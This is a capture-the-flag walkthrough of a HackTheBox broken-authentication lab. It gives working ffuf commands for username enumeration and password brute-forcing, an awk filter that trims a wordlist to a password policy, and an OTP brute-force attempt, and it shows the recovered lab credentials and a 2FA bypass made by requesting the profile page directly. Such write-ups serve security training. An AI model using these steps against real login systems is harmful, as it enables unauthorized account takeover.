HackTheBox - Broken Authentication - Skills Assessment Walkthrough

Scenario

You are tasked to perform a security assessment of a client's web application. For the assessment, the client has not provided you with credentials. Apply what you have learned in this module to obtain the flag.

Walkthrough

Navigate to the target URL http://94.237.122.117:41239:

We can see a Login page - let's navigate to it:

Let's try the credentials test:test to examine the error message:

We don’t have any known usernames, but we need to find a way to distinguish between a registered username and a non-existent one.

Go to the Register page:

Register a new account with the credentials test:test.

We received an error message indicating an invalid password due to the password policy:

So, let’s try to register an account with the credentials test:Zz1234567890.

After going back to the login page and trying to log in with the credentials test:test:

Now we can see that different error messages appear depending on whether a user is registered or not. This can help us determine which usernames exist in the system and allow us to enumerate them.

Let's use Burp to capture the request and save it to a file:

Then, enumerate the users using the request with ffuf:

ffuf -w /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt:FUZZ -request ./Desktop/login.txt -mr "credentials" --request-proto http

Found username:

gladys username is a valid username, now we can try brute-forcing it's password via the login page.

Modify the login.txt request file to use the discovered username, and the value FUZZ in the password parameter:

Now we need to fuzz passwords. We want to extract only passwords from the known list rockyou.txt that are exactly 12 characters long and contain at least one uppercase letter, one lowercase letter and one digit - without special characters at all.

Use the following command to do this:

awk 'length($0)==12 && /^[a-zA-Z0-9]+$/ && /[A-Z]/ && /[a-z]/ && /[0-9]/' ./Desktop/rockyou.txt > ./Desktop/passwords.txt

Then, use ffuf to find the password for the username:

ffuf -w ./Desktop/passwords.txt:FUZZ -request ./Desktop/login.txt --request-proto http

This will return a large number of results:

Using Burp Repeater, we can see that when logging in with the credentials test:Zz1234567890, we receive a 302 FOUND response. Let's match this status code (302).

ffuf -w ./Desktop/passwords.txt:FUZZ -request ./Desktop/login.txt --request-proto http -mc 302

Here is what we found:

We obtained valid credentials gladys:dWinaldasD13 !

When we login with those credentials, an OTP is required:

Let’s try to brute-force it:

seq -w 0 9999 > ./Desktop/tokens.txt

Intercept the request and save it to a file:

Use the following command to brute-force the OTP:

ffuf -w ./Desktop/tokens.txt:FUZZ -request ./Desktop/2fa.txt --request-proto http

It seems all responses have the same size and return a 302 FOUND status, so we can't reliably identify the valid OTP.

Back to our user test:Zz1234567890, we can see that the flow skips 2fa.php and goes directly to profile.php.

So, what if we try changing the GET request from 2fa.php to profile.php after logging in with the credentials gladys:dWinaldasD13 ?

Then, click Follow redirection:

And we are redirected to:

Change the GET request from /2fa.php to /profile.php, then click ‘Send':

We successfully bypassed the 2FA and found the flag ! 😁